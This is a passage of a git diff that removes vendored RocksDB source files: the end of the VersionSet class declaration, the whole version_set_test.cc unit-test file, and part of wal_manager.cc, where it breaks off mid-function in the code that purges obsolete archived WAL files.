-  // Returns the minimum log number such that all
-  // log numbers less than or equal to it can be deleted
-  uint64_t MinLogNumber() const {
-    uint64_t min_log_num = std::numeric_limits<uint64_t>::max();
-    for (auto cfd : *column_family_set_) {
-      // It's safe to ignore dropped column families here:
-      // cfd->IsDropped() becomes true after the drop is persisted in MANIFEST.
-      if (min_log_num > cfd->GetLogNumber() && !cfd->IsDropped()) {
-        min_log_num = cfd->GetLogNumber();
-      }
-    }
-    return min_log_num;
-  }
-
-  // Create an iterator that reads over the compaction inputs for "*c".
-  // The caller should delete the iterator when no longer needed.
-  InternalIterator* MakeInputIterator(const Compaction* c,
-                                      RangeDelAggregator* range_del_agg);
-
-  // Add all files listed in any live version to *live.
-  void AddLiveFiles(std::vector<FileDescriptor>* live_list);
-
-  // Return the approximate size of data to be scanned for range [start, end)
-  // in levels [start_level, end_level). If end_level == 0 it will search
-  // through all non-empty levels
-  uint64_t ApproximateSize(Version* v, const Slice& start, const Slice& end,
-                           int start_level = 0, int end_level = -1);
-
-  // Return the size of the current manifest file
-  uint64_t manifest_file_size() const { return manifest_file_size_; }
-
-  // verify that the files that we started with for a compaction
-  // still exist in the current version and in the same original level.
-  // This ensures that a concurrent compaction did not erroneously
-  // pick the same files to compact.
-  bool VerifyCompactionFileConsistency(Compaction* c);
-
-  Status GetMetadataForFile(uint64_t number, int* filelevel,
-                            FileMetaData** metadata, ColumnFamilyData** cfd);
-
-  // This function doesn't support leveldb SST filenames
-  void GetLiveFilesMetaData(std::vector<LiveFileMetaData> *metadata);
-
-  void GetObsoleteFiles(std::vector<FileMetaData*>* files,
-                        std::vector<std::string>* manifest_filenames,
-                        uint64_t min_pending_output);
-
-  ColumnFamilySet* GetColumnFamilySet() { return column_family_set_.get(); }
-  const EnvOptions& env_options() { return env_options_; }
-
-  static uint64_t GetNumLiveVersions(Version* dummy_versions);
-
-  static uint64_t GetTotalSstFilesSize(Version* dummy_versions);
-
- private:
-  struct ManifestWriter;
-
-  friend class Version;
-  friend class DBImpl;
-
-  struct LogReporter : public log::Reader::Reporter {
-    Status* status;
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      if (this->status->ok()) *this->status = s;
-    }
-  };
-
-  // ApproximateSize helper
-  uint64_t ApproximateSizeLevel0(Version* v, const LevelFilesBrief& files_brief,
-                                 const Slice& start, const Slice& end);
-
-  uint64_t ApproximateSize(Version* v, const FdWithKeyRange& f,
-                           const Slice& key);
-
-  // Save current contents to *log
-  Status WriteSnapshot(log::Writer* log);
-
-  void AppendVersion(ColumnFamilyData* column_family_data, Version* v);
-
-  ColumnFamilyData* CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                                       VersionEdit* edit);
-
-  std::unique_ptr<ColumnFamilySet> column_family_set_;
-
-  Env* const env_;
-  const std::string dbname_;
-  const ImmutableDBOptions* const db_options_;
-  std::atomic<uint64_t> next_file_number_;
-  uint64_t manifest_file_number_;
-  uint64_t options_file_number_;
-  uint64_t pending_manifest_file_number_;
-  // The last seq visible to reads
-  std::atomic<uint64_t> last_sequence_;
-  // The last seq with which a writer has written/will write.
-  std::atomic<uint64_t> last_to_be_written_sequence_;
-  uint64_t prev_log_number_;  // 0 or backing store for memtable being compacted
-
-  // Opened lazily
-  unique_ptr<log::Writer> descriptor_log_;
-
-  // generates a increasing version number for every new version
-  uint64_t current_version_number_;
-
-  // Queue of writers to the manifest file
-  std::deque<ManifestWriter*> manifest_writers_;
-
-  // Current size of manifest file
-  uint64_t manifest_file_size_;
-
-  std::vector<FileMetaData*> obsolete_files_;
-  std::vector<std::string> obsolete_manifests_;
-
-  // env options for all reads and writes except compactions
-  const EnvOptions& env_options_;
-
-  // env options used for compactions. This is a copy of
-  // env_options_ but with readaheads set to readahead_compactions_.
-  const EnvOptions env_options_compactions_;
-
-  // No copying allowed
-  VersionSet(const VersionSet&);
-  void operator=(const VersionSet&);
-
-  void LogAndApplyCFHelper(VersionEdit* edit);
-  void LogAndApplyHelper(ColumnFamilyData* cfd, VersionBuilder* b, Version* v,
-                         VersionEdit* edit, InstrumentedMutex* mu);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_set_test.cc b/thirdparty/rocksdb/db/version_set_test.cc
deleted file mode 100644
index 625d459..0000000
--- a/thirdparty/rocksdb/db/version_set_test.cc
+++ /dev/null
@@ -1,458 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_set.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class GenerateLevelFilesBriefTest : public testing::Test {
- public:
-  std::vector<FileMetaData*> files_;
-  LevelFilesBrief file_level_;
-  Arena arena_;
-
-  GenerateLevelFilesBriefTest() { }
-
-  ~GenerateLevelFilesBriefTest() {
-    for (size_t i = 0; i < files_.size(); i++) {
-      delete files_[i];
-    }
-  }
-
-  void Add(const char* smallest, const char* largest,
-           SequenceNumber smallest_seq = 100,
-           SequenceNumber largest_seq = 100) {
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(files_.size() + 1, 0, 0);
-    f->smallest = InternalKey(smallest, smallest_seq, kTypeValue);
-    f->largest = InternalKey(largest, largest_seq, kTypeValue);
-    files_.push_back(f);
-  }
-
-  int Compare() {
-    int diff = 0;
-    for (size_t i = 0; i < files_.size(); i++) {
-      if (file_level_.files[i].fd.GetNumber() != files_[i]->fd.GetNumber()) {
-        diff++;
-      }
-    }
-    return diff;
-  }
-};
-
-TEST_F(GenerateLevelFilesBriefTest, Empty) {
-  DoGenerateLevelFilesBrief(&file_level_, files_, &arena_);
-  ASSERT_EQ(0u, file_level_.num_files);
-  ASSERT_EQ(0, Compare());
-}
-
-TEST_F(GenerateLevelFilesBriefTest, Single) {
-  Add("p", "q");
-  DoGenerateLevelFilesBrief(&file_level_, files_, &arena_);
-  ASSERT_EQ(1u, file_level_.num_files);
-  ASSERT_EQ(0, Compare());
-}
-
-TEST_F(GenerateLevelFilesBriefTest, Multiple) {
-  Add("150", "200");
-  Add("200", "250");
-  Add("300", "350");
-  Add("400", "450");
-  DoGenerateLevelFilesBrief(&file_level_, files_, &arena_);
-  ASSERT_EQ(4u, file_level_.num_files);
-  ASSERT_EQ(0, Compare());
-}
-
-class CountingLogger : public Logger {
- public:
-  CountingLogger() : log_count(0) {}
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override { log_count++; }
-  int log_count;
-};
-
-Options GetOptionsWithNumLevels(int num_levels,
-                                std::shared_ptr<CountingLogger> logger) {
-  Options opt;
-  opt.num_levels = num_levels;
-  opt.info_log = logger;
-  return opt;
-}
-
-class VersionStorageInfoTest : public testing::Test {
- public:
-  const Comparator* ucmp_;
-  InternalKeyComparator icmp_;
-  std::shared_ptr<CountingLogger> logger_;
-  Options options_;
-  ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-  VersionStorageInfo vstorage_;
-
-  InternalKey GetInternalKey(const char* ukey,
-                             SequenceNumber smallest_seq = 100) {
-    return InternalKey(ukey, smallest_seq, kTypeValue);
-  }
-
-  VersionStorageInfoTest()
-      : ucmp_(BytewiseComparator()),
-        icmp_(ucmp_),
-        logger_(new CountingLogger()),
-        options_(GetOptionsWithNumLevels(6, logger_)),
-        ioptions_(options_),
-        mutable_cf_options_(options_),
-        vstorage_(&icmp_, ucmp_, 6, kCompactionStyleLevel, nullptr, false) {}
-
-  ~VersionStorageInfoTest() {
-    for (int i = 0; i < vstorage_.num_levels(); i++) {
-      for (auto* f : vstorage_.LevelFiles(i)) {
-        if (--f->refs == 0) {
-          delete f;
-        }
-      }
-    }
-  }
-
-  void Add(int level, uint32_t file_number, const char* smallest,
-           const char* largest, uint64_t file_size = 0) {
-    assert(level < vstorage_.num_levels());
-    FileMetaData* f = new FileMetaData;
-    f->fd = FileDescriptor(file_number, 0, file_size);
-    f->smallest = GetInternalKey(smallest, 0);
-    f->largest = GetInternalKey(largest, 0);
-    f->compensated_file_size = file_size;
-    f->refs = 0;
-    f->num_entries = 0;
-    f->num_deletions = 0;
-    vstorage_.AddFile(level, f);
-  }
-};
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelStatic) {
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.max_bytes_for_level_base = 10;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 5;
-  Add(4, 100U, "1", "2");
-  Add(5, 101U, "1", "2");
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(1), 10U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 50U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 250U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1250U);
-
-  ASSERT_EQ(0, logger_->log_count);
-}
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelDynamic) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 5;
-  Add(5, 1U, "1", "2", 500U);
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(0, logger_->log_count);
-  ASSERT_EQ(vstorage_.base_level(), 5);
-
-  Add(5, 2U, "3", "4", 550U);
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(0, logger_->log_count);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 4);
-
-  Add(4, 3U, "3", "4", 550U);
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(0, logger_->log_count);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 4);
-
-  Add(3, 4U, "3", "4", 250U);
-  Add(3, 5U, "5", "7", 300U);
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(1, logger_->log_count);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 1005U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 3);
-
-  Add(1, 6U, "3", "4", 5U);
-  Add(1, 7U, "8", "9", 5U);
-  logger_->log_count = 0;
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(1, logger_->log_count);
-  ASSERT_GT(vstorage_.MaxBytesForLevel(4), 1005U);
-  ASSERT_GT(vstorage_.MaxBytesForLevel(3), 1005U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 1005U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(1), 1000U);
-  ASSERT_EQ(vstorage_.base_level(), 1);
-}
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelDynamicLotsOfData) {
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.max_bytes_for_level_base = 100;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 2;
-  Add(0, 1U, "1", "2", 50U);
-  Add(1, 2U, "1", "2", 50U);
-  Add(2, 3U, "1", "2", 500U);
-  Add(3, 4U, "1", "2", 500U);
-  Add(4, 5U, "1", "2", 1700U);
-  Add(5, 6U, "1", "2", 500U);
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 800U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 400U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 200U);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(1), 100U);
-  ASSERT_EQ(vstorage_.base_level(), 1);
-  ASSERT_EQ(0, logger_->log_count);
-}
-
-TEST_F(VersionStorageInfoTest, MaxBytesForLevelDynamicLargeLevel) {
-  uint64_t kOneGB = 1000U * 1000U * 1000U;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.max_bytes_for_level_base = 10U * kOneGB;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  Add(0, 1U, "1", "2", 50U);
-  Add(3, 4U, "1", "2", 32U * kOneGB);
-  Add(4, 5U, "1", "2", 500U * kOneGB);
-  Add(5, 6U, "1", "2", 3000U * kOneGB);
-
-  vstorage_.CalculateBaseBytes(ioptions_, mutable_cf_options_);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(5), 3000U * kOneGB);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(4), 300U * kOneGB);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(3), 30U * kOneGB);
-  ASSERT_EQ(vstorage_.MaxBytesForLevel(2), 10U * kOneGB);
-  ASSERT_EQ(vstorage_.base_level(), 2);
-  ASSERT_EQ(0, logger_->log_count);
-}
-
-TEST_F(VersionStorageInfoTest, EstimateLiveDataSize) {
-  // Test whether the overlaps are detected as expected
-  Add(1, 1U, "4", "7", 1U);  // Perfect overlap with last level
-  Add(2, 2U, "3", "5", 1U);  // Partial overlap with last level
-  Add(2, 3U, "6", "8", 1U);  // Partial overlap with last level
-  Add(3, 4U, "1", "9", 1U);  // Contains range of last level
-  Add(4, 5U, "4", "5", 1U);  // Inside range of last level
-  Add(4, 5U, "6", "7", 1U);  // Inside range of last level
-  Add(5, 6U, "4", "7", 10U);
-  ASSERT_EQ(10U, vstorage_.EstimateLiveDataSize());
-}
-
-TEST_F(VersionStorageInfoTest, EstimateLiveDataSize2) {
-  Add(0, 1U, "9", "9", 1U);  // Level 0 is not ordered
-  Add(0, 1U, "5", "6", 1U);  // Ignored because of [5,6] in l1
-  Add(1, 1U, "1", "2", 1U);  // Ignored because of [2,3] in l2
-  Add(1, 2U, "3", "4", 1U);  // Ignored because of [2,3] in l2
-  Add(1, 3U, "5", "6", 1U);
-  Add(2, 4U, "2", "3", 1U);
-  Add(3, 5U, "7", "8", 1U);
-  ASSERT_EQ(4U, vstorage_.EstimateLiveDataSize());
-}
-
-class FindLevelFileTest : public testing::Test {
- public:
-  LevelFilesBrief file_level_;
-  bool disjoint_sorted_files_;
-  Arena arena_;
-
-  FindLevelFileTest() : disjoint_sorted_files_(true) { }
-
-  ~FindLevelFileTest() {
-  }
-
-  void LevelFileInit(size_t num = 0) {
-    char* mem = arena_.AllocateAligned(num * sizeof(FdWithKeyRange));
-    file_level_.files = new (mem)FdWithKeyRange[num];
-    file_level_.num_files = 0;
-  }
-
-  void Add(const char* smallest, const char* largest,
-           SequenceNumber smallest_seq = 100,
-           SequenceNumber largest_seq = 100) {
-    InternalKey smallest_key = InternalKey(smallest, smallest_seq, kTypeValue);
-    InternalKey largest_key = InternalKey(largest, largest_seq, kTypeValue);
-
-    Slice smallest_slice = smallest_key.Encode();
-    Slice largest_slice = largest_key.Encode();
-
-    char* mem = arena_.AllocateAligned(
-        smallest_slice.size() + largest_slice.size());
-    memcpy(mem, smallest_slice.data(), smallest_slice.size());
-    memcpy(mem + smallest_slice.size(), largest_slice.data(),
-        largest_slice.size());
-
-    // add to file_level_
-    size_t num = file_level_.num_files;
-    auto& file = file_level_.files[num];
-    file.fd = FileDescriptor(num + 1, 0, 0);
-    file.smallest_key = Slice(mem, smallest_slice.size());
-    file.largest_key = Slice(mem + smallest_slice.size(),
-        largest_slice.size());
-    file_level_.num_files++;
-  }
-
-  int Find(const char* key) {
-    InternalKey target(key, 100, kTypeValue);
-    InternalKeyComparator cmp(BytewiseComparator());
-    return FindFile(cmp, file_level_, target.Encode());
-  }
-
-  bool Overlaps(const char* smallest, const char* largest) {
-    InternalKeyComparator cmp(BytewiseComparator());
-    Slice s(smallest != nullptr ? smallest : "");
-    Slice l(largest != nullptr ? largest : "");
-    return SomeFileOverlapsRange(cmp, disjoint_sorted_files_, file_level_,
-                                 (smallest != nullptr ? &s : nullptr),
-                                 (largest != nullptr ? &l : nullptr));
-  }
-};
-
-TEST_F(FindLevelFileTest, LevelEmpty) {
-  LevelFileInit(0);
-
-  ASSERT_EQ(0, Find("foo"));
-  ASSERT_TRUE(! Overlaps("a", "z"));
-  ASSERT_TRUE(! Overlaps(nullptr, "z"));
-  ASSERT_TRUE(! Overlaps("a", nullptr));
-  ASSERT_TRUE(! Overlaps(nullptr, nullptr));
-}
-
-TEST_F(FindLevelFileTest, LevelSingle) {
-  LevelFileInit(1);
-
-  Add("p", "q");
-  ASSERT_EQ(0, Find("a"));
-  ASSERT_EQ(0, Find("p"));
-  ASSERT_EQ(0, Find("p1"));
-  ASSERT_EQ(0, Find("q"));
-  ASSERT_EQ(1, Find("q1"));
-  ASSERT_EQ(1, Find("z"));
-
-  ASSERT_TRUE(! Overlaps("a", "b"));
-  ASSERT_TRUE(! Overlaps("z1", "z2"));
-  ASSERT_TRUE(Overlaps("a", "p"));
-  ASSERT_TRUE(Overlaps("a", "q"));
-  ASSERT_TRUE(Overlaps("a", "z"));
-  ASSERT_TRUE(Overlaps("p", "p1"));
-  ASSERT_TRUE(Overlaps("p", "q"));
-  ASSERT_TRUE(Overlaps("p", "z"));
-  ASSERT_TRUE(Overlaps("p1", "p2"));
-  ASSERT_TRUE(Overlaps("p1", "z"));
-  ASSERT_TRUE(Overlaps("q", "q"));
-  ASSERT_TRUE(Overlaps("q", "q1"));
-
-  ASSERT_TRUE(! Overlaps(nullptr, "j"));
-  ASSERT_TRUE(! Overlaps("r", nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, "p"));
-  ASSERT_TRUE(Overlaps(nullptr, "p1"));
-  ASSERT_TRUE(Overlaps("q", nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, nullptr));
-}
-
-TEST_F(FindLevelFileTest, LevelMultiple) {
-  LevelFileInit(4);
-
-  Add("150", "200");
-  Add("200", "250");
-  Add("300", "350");
-  Add("400", "450");
-  ASSERT_EQ(0, Find("100"));
-  ASSERT_EQ(0, Find("150"));
-  ASSERT_EQ(0, Find("151"));
-  ASSERT_EQ(0, Find("199"));
-  ASSERT_EQ(0, Find("200"));
-  ASSERT_EQ(1, Find("201"));
-  ASSERT_EQ(1, Find("249"));
-  ASSERT_EQ(1, Find("250"));
-  ASSERT_EQ(2, Find("251"));
-  ASSERT_EQ(2, Find("299"));
-  ASSERT_EQ(2, Find("300"));
-  ASSERT_EQ(2, Find("349"));
-  ASSERT_EQ(2, Find("350"));
-  ASSERT_EQ(3, Find("351"));
-  ASSERT_EQ(3, Find("400"));
-  ASSERT_EQ(3, Find("450"));
-  ASSERT_EQ(4, Find("451"));
-
-  ASSERT_TRUE(! Overlaps("100", "149"));
-  ASSERT_TRUE(! Overlaps("251", "299"));
-  ASSERT_TRUE(! Overlaps("451", "500"));
-  ASSERT_TRUE(! Overlaps("351", "399"));
-
-  ASSERT_TRUE(Overlaps("100", "150"));
-  ASSERT_TRUE(Overlaps("100", "200"));
-  ASSERT_TRUE(Overlaps("100", "300"));
-  ASSERT_TRUE(Overlaps("100", "400"));
-  ASSERT_TRUE(Overlaps("100", "500"));
-  ASSERT_TRUE(Overlaps("375", "400"));
-  ASSERT_TRUE(Overlaps("450", "450"));
-  ASSERT_TRUE(Overlaps("450", "500"));
-}
-
-TEST_F(FindLevelFileTest, LevelMultipleNullBoundaries) {
-  LevelFileInit(4);
-
-  Add("150", "200");
-  Add("200", "250");
-  Add("300", "350");
-  Add("400", "450");
-  ASSERT_TRUE(! Overlaps(nullptr, "149"));
-  ASSERT_TRUE(! Overlaps("451", nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, nullptr));
-  ASSERT_TRUE(Overlaps(nullptr, "150"));
-  ASSERT_TRUE(Overlaps(nullptr, "199"));
-  ASSERT_TRUE(Overlaps(nullptr, "200"));
-  ASSERT_TRUE(Overlaps(nullptr, "201"));
-  ASSERT_TRUE(Overlaps(nullptr, "400"));
-  ASSERT_TRUE(Overlaps(nullptr, "800"));
-  ASSERT_TRUE(Overlaps("100", nullptr));
-  ASSERT_TRUE(Overlaps("200", nullptr));
-  ASSERT_TRUE(Overlaps("449", nullptr));
-  ASSERT_TRUE(Overlaps("450", nullptr));
-}
-
-TEST_F(FindLevelFileTest, LevelOverlapSequenceChecks) {
-  LevelFileInit(1);
-
-  Add("200", "200", 5000, 3000);
-  ASSERT_TRUE(! Overlaps("199", "199"));
-  ASSERT_TRUE(! Overlaps("201", "300"));
-  ASSERT_TRUE(Overlaps("200", "200"));
-  ASSERT_TRUE(Overlaps("190", "200"));
-  ASSERT_TRUE(Overlaps("200", "210"));
-}
-
-TEST_F(FindLevelFileTest, LevelOverlappingFiles) {
-  LevelFileInit(2);
-
-  Add("150", "600");
-  Add("400", "500");
-  disjoint_sorted_files_ = false;
-  ASSERT_TRUE(! Overlaps("100", "149"));
-  ASSERT_TRUE(! Overlaps("601", "700"));
-  ASSERT_TRUE(Overlaps("100", "150"));
-  ASSERT_TRUE(Overlaps("100", "200"));
-  ASSERT_TRUE(Overlaps("100", "300"));
-  ASSERT_TRUE(Overlaps("100", "400"));
-  ASSERT_TRUE(Overlaps("100", "500"));
-  ASSERT_TRUE(Overlaps("375", "400"));
-  ASSERT_TRUE(Overlaps("450", "450"));
-  ASSERT_TRUE(Overlaps("450", "500"));
-  ASSERT_TRUE(Overlaps("450", "700"));
-  ASSERT_TRUE(Overlaps("600", "700"));
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/wal_manager.cc b/thirdparty/rocksdb/db/wal_manager.cc
deleted file mode 100644
index 4a9ecbf..0000000
--- a/thirdparty/rocksdb/db/wal_manager.cc
+++ /dev/null
@@ -1,476 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/wal_manager.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <vector>
-#include <memory>
-
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/transaction_log_impl.h"
-#include "db/write_batch_internal.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/write_batch.h"
-#include "util/cast_util.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-Status WalManager::GetSortedWalFiles(VectorLogPtr& files) {
-  // First get sorted files in db dir, then get sorted files from archived
-  // dir, to avoid a race condition where a log file is moved to archived
-  // dir in between.
-  Status s;
-  // list wal files in main db dir.
-  VectorLogPtr logs;
-  s = GetSortedWalsOfType(db_options_.wal_dir, logs, kAliveLogFile);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Reproduce the race condition where a log file is moved
-  // to archived dir, between these two sync points, used in
-  // (DBTest,TransactionLogIteratorRace)
-  TEST_SYNC_POINT("WalManager::GetSortedWalFiles:1");
-  TEST_SYNC_POINT("WalManager::GetSortedWalFiles:2");
-
-  files.clear();
-  // list wal files in archive dir.
-  std::string archivedir = ArchivalDirectory(db_options_.wal_dir);
-  Status exists = env_->FileExists(archivedir);
-  if (exists.ok()) {
-    s = GetSortedWalsOfType(archivedir, files, kArchivedLogFile);
-    if (!s.ok()) {
-      return s;
-    }
-  } else if (!exists.IsNotFound()) {
-    assert(s.IsIOError());
-    return s;
-  }
-
-  uint64_t latest_archived_log_number = 0;
-  if (!files.empty()) {
-    latest_archived_log_number = files.back()->LogNumber();
-    ROCKS_LOG_INFO(db_options_.info_log, "Latest Archived log: %" PRIu64,
-                   latest_archived_log_number);
-  }
-
-  files.reserve(files.size() + logs.size());
-  for (auto& log : logs) {
-    if (log->LogNumber() > latest_archived_log_number) {
-      files.push_back(std::move(log));
-    } else {
-      // When the race condition happens, we could see the
-      // same log in both db dir and archived dir. Simply
-      // ignore the one in db dir. Note that, if we read
-      // archived dir first, we would have missed the log file.
-      ROCKS_LOG_WARN(db_options_.info_log, "%s already moved to archive",
-                     log->PathName().c_str());
-    }
-  }
-
-  return s;
-}
-
-Status WalManager::GetUpdatesSince(
-    SequenceNumber seq, std::unique_ptr<TransactionLogIterator>* iter,
-    const TransactionLogIterator::ReadOptions& read_options,
-    VersionSet* version_set) {
-
-  //  Get all sorted Wal Files.
-  //  Do binary search and open files and find the seq number.
-
-  std::unique_ptr<VectorLogPtr> wal_files(new VectorLogPtr);
-  Status s = GetSortedWalFiles(*wal_files);
-  if (!s.ok()) {
-    return s;
-  }
-
-  s = RetainProbableWalFiles(*wal_files, seq);
-  if (!s.ok()) {
-    return s;
-  }
-  iter->reset(new TransactionLogIteratorImpl(
-      db_options_.wal_dir, &db_options_, read_options, env_options_, seq,
-      std::move(wal_files), version_set));
-  return (*iter)->status();
-}
-
-// 1. Go through all archived files and
-//    a. if ttl is enabled, delete outdated files
-//    b. if archive size limit is enabled, delete empty files,
-//        compute file number and size.
-// 2. If size limit is enabled:
-//    a. compute how many files should be deleted
-//    b. get sorted non-empty archived logs
-//    c. delete what should be deleted
-void WalManager::PurgeObsoleteWALFiles() {
-  bool const ttl_enabled = db_options_.wal_ttl_seconds > 0;
-  bool const size_limit_enabled = db_options_.wal_size_limit_mb > 0;
-  if (!ttl_enabled && !size_limit_enabled) {
-    return;
-  }
-
-  int64_t current_time;
-  Status s = env_->GetCurrentTime(&current_time);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log, "Can't get current time: %s",
-                    s.ToString().c_str());
-    assert(false);
-    return;
-  }
-  uint64_t const now_seconds = static_cast<uint64_t>(current_time);
-  uint64_t const time_to_check = (ttl_enabled && !size_limit_enabled)
-                                     ? db_options_.wal_ttl_seconds / 2
-                                     : kDefaultIntervalToDeleteObsoleteWAL;
-
-  if (purge_wal_files_last_run_ + time_to_check > now_seconds) {
-    return;
-  }
-
-  purge_wal_files_last_run_ = now_seconds;
-
-  std::string archival_dir = ArchivalDirectory(db_options_.wal_dir);
-  std::vector<std::string> files;
-  s = env_->GetChildren(archival_dir, &files);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log, "Can't get archive files: %s",
-                    s.ToString().c_str());
-    assert(false);
-    return;
-  }
-
-  size_t log_files_num = 0;
-  uint64_t log_file_size = 0;
-
-  for (auto& f : files) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kLogFile) {
-      std::string const file_path = archival_dir + "/" + f;
-      if (ttl_enabled) {
-        uint64_t file_m_time;
-        s = env_->GetFileModificationTime(file_path, &file_m_time);
-        if (!s.ok()) {
-          ROCKS_LOG_WARN(db_options_.info_log,
-                         "Can't get file mod time: %s: %s", file_path.c_str(),
-                         s.ToString().c_str());
-          continue;
-        }
-        if (now_seconds - file_m_time > db_options_.wal_ttl_seconds) {
-          s = env_->DeleteFile(file_path);
-          if (!s.ok()) {
-            ROCKS_LOG_WARN(db_options_.info_log, "Can't delete file: %s: %s",
-                           file_path.c_str(), s.ToString().c_str());
-            continue;
-          } else {
-            MutexLock l(&read_first_record_cache_mutex_);
-            read_first_record_cache_.erase(number);
-          }
-          continue;
-        }
-      }
-
-      if (size_limit_enabled) {
-        uint64_t file_size;
-        s = env_->GetFileSize(file_path, &file_size);
-        if (!s.ok()) {
-          ROCKS_LOG_ERROR(db_options_.info_log,
-                          "Unable to get file size: %s: %s", file_path.c_str(),
-                          s.ToString().c_str());
-          return;
-        } else {
-          if (file_size > 0) {
-            log_file_size = std::max(log_file_size, file_size);
-            ++log_files_num;
-          } else {
-            s = env_->DeleteFile(file_path);
-            if (!s.ok()) {
-              ROCKS_LOG_WARN(db_options_.info_log,
-                             "Unable to delete file: %s: %s", file_path.c_str(),
-                             s.ToString().c_str());
-              continue;
-            } else {
-              MutexLock l(&read_first_record_cache_mutex_);
-              read_first_record_cache_.erase(number);
-            }
-          }
-        }
-      }
-    }
-  }
-
-  if (0 == log_files_num || !size_limit_enabled) {
-    return;
-  }
-
-  size_t const files_keep_num =
-      db_options_.wal_size_limit_mb * 1024 * 1024 / log_file_size;
-  if (log_files_num <= files_keep_num) {
-    return;
-  }
-
-  size_t files_del_num = log_files_num - files_keep_num;
-  VectorLogPtr archived_logs;
-  GetSortedWalsOfType(archival_dir, archived_logs, kArchivedLogFile);
-
-  if (files_del_num > archived_logs.size()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Trying to delete more archived log files than "
-                   "exist. Deleting all");
-    files_del_num = archived_logs.size();
-  }
-
-  for (size_t i = 0; i < files_del_num; ++i) {
-    std::string const file_path = archived_logs[i]->PathName();
-    s = env_->DeleteFile(db_options_.wal_dir + "/" + file_path);
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(db_options_.info_log, "Unable to delete file: %s: %s",
-                     file_path.c_str(), s.ToString().c_str());
-      continue;
-    } else {
